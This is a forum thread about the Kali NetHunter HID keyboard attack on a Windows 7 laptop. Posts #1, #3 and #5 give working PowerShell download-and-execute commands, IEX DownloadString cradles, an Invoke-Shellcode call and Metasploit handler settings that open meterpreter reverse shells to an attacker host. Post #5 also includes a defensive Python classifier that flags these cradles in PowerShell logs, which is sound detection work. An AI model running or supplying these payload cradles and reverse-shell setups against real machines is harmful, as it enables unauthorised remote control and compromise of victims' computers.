
Thread: Hid Keyboard, Payload.

  1. #1

    Hid Keyboard, Payload.

    I recently, for one reason or another (probably user error), had trouble getting a Windows 7 laptop to accept a payload.
    Having tried various ways and come up empty-handed, I ended up creating the payload with Veil-Evasion and hosting it
    in my Nexus #/data/local/kali-armhf/var/www folder.

    I then used the Windows CMD section of HID Keyboard Attack and entered the following; 192.168.0.2 was the IP of my
    Nexus.

    REM typed into the cmd window opened by the HID attack
    CD c:\
    Powershell
    # from here on the lines run inside PowerShell
    $Url='http://192.168.0.2/payload.bat'
    $Path='C:\payload.bat'
    $Username=''
    $Password=''

    $WebClient=New-Object System.Net.WebClient
    $WebClient.Credentials=New-Object System.Net.NetworkCredential($Username, $Password)
    $WebClient.DownloadFile( $Url, $Path )

    # leave PowerShell, then run the downloaded file from cmd
    exit
    payload.bat

    Then I set up the listener on my Kali laptop to wait for a call. I selected Windows 7, ticked Admin, plugged
    in and pressed Execute. The Windows 7 laptop proceeded to download the payload from my Nexus and run it.
    Kali then received a call back straight away. I'm sure this is by far not the best way to do this and could
    probably be done a lot more easily another way, but for me it suited the situation. I just wanted to share.

    Many thanks.

  2. #2
    Would you mind expanding a bit on how to set up the listener?

  3. #3
    Sure, I apologise for my terrible writing; I have no excuse.

    Well, first I opened a console and did: service postgresql start
    Followed by: msfconsole

    Next I used at the msf prompt: use exploit/multi/handler
    then: set PAYLOAD windows/meterpreter/reverse_http

    The payload, I guess, really depends on your payload. Anyway, just set your LHOST and LPORT and make sure the relevant ports, if needed, are forwarded in your router.

    Hope this helps; if not, give me another shout. Again, sorry for the terrible writing, it's just not my thing. Cheers

  4. #4
    You should post pictures up for everyone to follow.

  5. #5
    Quote Originally Posted by skycrazy:
    Sure, I apologise for my terrible writing; I have no excuse.

    Well, first I opened a console and did: service postgresql start
    Followed by: msfconsole

    Next I used at the msf prompt: use exploit/multi/handler
    then: set PAYLOAD windows/meterpreter/reverse_http

    The payload, I guess, really depends on your payload. Anyway, just set your LHOST and LPORT and make sure the relevant ports, if needed, are forwarded in your router.

    Hope this helps; if not, give me another shout. Again, sorry for the terrible writing, it's just not my thing. Cheers

    I'm having a lot of trouble trying to get HID Keyboard Attack to work; your information was really helpful.

    What I usually do is send the PowerShell to download the file from my NetHunter device (the usual payload), and the system connects fine using the Windows CMD attack. I can't get it to work from the PowerSploit one.

    c:\>powershell
    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    For some reason that I can't understand, the payload from NetHunter is not downloaded from the /var/www/ directory. I found that this file needs to be in the /usr/share/mana-toolkit/www/portal/ directory. If the file is not there the system won't download it because it can't find it.

    When I'm using this

    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    sometimes Meterpreter has problems backgrounding the session, so I end up using

    IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.105 -Lport 4444 -Force

    By the way, I'm supposed to be using NetHunter 2.0.1 on Lollipop, but the NetHunter Home reports Version 1.0.

    Please excuse my poor English.
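    A defender-side counterpart to the download cradles shown in #1 and in this post, added here as an example and not taken from the thread or from NetHunter: a small Python classifier that runs over PowerShell script-block log text (the kind recorded by script block logging) and flags the WebClient download, the IEX cradle and Invoke-Shellcode. The rule names, severity scheme and sample lines are my own constructions, modelled on the commands quoted above.

```python
import re
from ipaddress import ip_address

# Constructed sample script-block texts, modelled on the commands in this thread.
SAMPLE_SCRIPT_BLOCKS = [
    "$WebClient=New-Object System.Net.WebClient; $WebClient.DownloadFile( $url, $path )",
    'IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")',
    'IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); '
    "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.105 -Lport 4444 -Force",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",  # benign admin command
]

# Each rule is (indicator name, regex applied to the normalised text).
RULES = [
    ("webclient_download", re.compile(r"net\.webclient\b.*?\.download(file|string)\s*\(")),
    ("invoke_expression_cradle", re.compile(r"\b(iex|invoke-expression)\b")),
    ("invoke_shellcode", re.compile(r"\binvoke-shellcode\b")),
    ("meterpreter_payload", re.compile(r"\bwindows/meterpreter/reverse_https?\b")),
]
URL_RE = re.compile(r"https?://([0-9]{1,3}(?:\.[0-9]{1,3}){3})(?::\d+)?/")


def normalise(block):
    # Lower-case, collapse whitespace and fold dash look-alikes into '-', so a
    # pasted "–Payload" matches the same rule as "-Payload".
    text = block.replace("\u2013", "-").replace("\u2014", "-")
    return " ".join(text.split()).lower()


def analyse_script_block(block):
    """Return the sorted indicator names fired by one logged script block."""
    text = normalise(block)
    hits = {name for name, rx in RULES if rx.search(text)}
    for match in URL_RE.finditer(text):
        try:
            if ip_address(match.group(1)).is_private:
                hits.add("download_from_private_ip")  # staging host on the LAN, as in this thread
        except ValueError:
            continue  # malformed octet, not an address
    return sorted(hits)


def score(block):
    # A bare IEX is noisy on its own; a download cradle combined with IEX or
    # Invoke-Shellcode is what deserves a high-severity alert.
    hits = set(analyse_script_block(block))
    if "webclient_download" in hits and hits & {"invoke_expression_cradle", "invoke_shellcode"}:
        return "high"
    return "medium" if hits else "none"
```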

  6. #6
    You used the Veil-Evasion tool to create a payload, hosted it on a Kali Linux machine, and used the HID Keyboard Attack feature in Windows Command Prompt to download the payload onto a Windows 7 laptop. You then set up a listener on your Kali machine, waited for a connection, and were able to remotely execute the payload on the Windows 7 laptop. While this method worked for you, there are likely easier and more efficient ways to achieve the same result, such as using Metasploit or other penetration testing tools.
